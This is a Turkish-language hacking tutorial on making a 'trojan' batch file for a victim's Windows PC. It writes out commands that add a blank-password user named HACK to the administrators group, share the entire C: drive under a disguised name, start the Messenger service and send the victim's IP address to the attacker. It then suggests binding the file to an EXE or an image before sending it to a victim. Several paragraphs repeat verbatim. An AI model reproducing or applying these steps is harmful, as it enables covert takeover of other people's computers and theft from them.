Evet arkadaslar* konunun başlığından da anlayabileceginiz gibi Anti Virüs programları tarafından tanınmayan tamamen size ait bir truva atı yapmayı size kısaca anlatacağım.
Truva atının ana amacı* adından da anlaşılacağı gibi hedef sisteme sızarak sistemi ele geçirmek ya da bilgi toplamaktır. Dikkat edin zarar vermek demiyorum çünkü bu etik olarak yanlış bir harekettir
Şimdi Truva atımızı hazırlamaya başlayalım
Truva atının ana amacı* adından da anlaşılacağı gibi hedef sisteme sızarak sistemi ele geçirmek ya da bilgi toplamaktır. Dikkat edin zarar vermek demiyorum çünkü bu etik olarak yanlış bir harekettir
Şimdi Truva atımızı hazırlamaya başlayalım
1-) Öncelikle bir TXT dosyası açın ve içine şu komutu girin;
net user HACK /add
Bu komut sayesinde kurbanin makinasında "HACK" isminde bir user yarattık. Fakat bu user hesabı normal olarak açıldigi icin hakları da sınırlı olacaktır. Bu nedenle ikinci aşamaya geçiyoruz;
2-) şimdi yukarıdaki komutun hemen bir alt satırına geçin ve şu komutu ekleyin;
net localgroup administrators HACK /add
Böylece "HACK" isimli kullanıcı hesabını* direk yönetici(admin) grubuna kattık. Artık "HACK" hesabımız tüm yetkilere sahip.
3-) Simdi de kurbanımızın makinasındaki C: sürücüsünü sınırsız paylaşıma açacağız. Kurbanı da huylandırmamak için paylaşım adını SYSTEM olarak yapacağız. Bunun için aşağıdaki komutu kullanacağız;
net share system=C: /unlimited
Evet artık Kurbanımızın makinasını sonuna kadar açtık. Peki kurbanın IP sini nereden bileceğiz de kurbanın makinasina bu yarattığımız "HACK" hesabından bağlanacağız?
Bunun için de kodumuza bir satırlık bir komut daha ekleyeceğiz;
Bunun için de kodumuza bir satırlık bir komut daha ekleyeceğiz;
4-) NET SEND komutunu kullanarak kurbanın bize Windowsun Messaging Servisi vasıtası ile mesaj atmasını ve IP sını bize söylemesini saglayacağız. Bunun icin aşağıdaki komutu da kodunuzun içerisine ekleyin;
net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin kurbanınım Gel bana baglan
Unutmayın 82. li baslayan IP adresi yerine kendi IP nizi yazin.
Unutmayın 82. li baslayan IP adresi yerine kendi IP nizi yazin.
4-) Son olarak ufak bir önlem alacagiz. Peki nedir bu önlem? Bildiğiniz gibi Windows Messenger Servisini kullanan internette ortalıkta gezinen bircok ufak tefek Spylar oldugu icin Messenger servisi genelde Disabled dir. Disabled olursa NET SEND komutu bir işe yaramaz. Iste bu son önlemimizde de bu servisi Disabled tan Automatic moduna set ettirecegiz. Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod icerisinde kullanacagimiz adını öğreniyoruz. Adi Messenger mis. simdi bu adı kullanarak bu servisi çalıstırıyoruz.
net start Messenger
Size tavsiyem bu son komutu kodunuzun en basina koymaniz. Böylelikle ardışık sırada önce Messenger servisi çalıştırılacak daha sonra diğer işlemler yapılacaktır. Kodun sağlıklı çalışması açısından bu 4. şıkkı ilk sıraya koymanız daha iyi olur.
Son olarak TXT de yazdığınız kodunuzu .bat olarak istediginiz bir isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile birlestirin isterseniz kurbaniniza direk gönderin.
Kurbanınız bu dosyayı çalıştırdiğı an makinasında Admin haklarına sahip HACK adında bir user açılacak ve şifresi de blank yani boş olacaktır. C: sürücüsü de full olarak paylasima açilmış olacak ve son olarak da IP si size gelecektir.
Son olarak TXT de yazdığınız kodunuzu .bat olarak istediginiz bir isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile birlestirin isterseniz kurbaniniza direk gönderin.
Kurbanınız bu dosyayı çalıştırdiğı an makinasında Admin haklarına sahip HACK adında bir user açılacak ve şifresi de blank yani boş olacaktır. C: sürücüsü de full olarak paylasima açilmış olacak ve son olarak da IP si size gelecektir.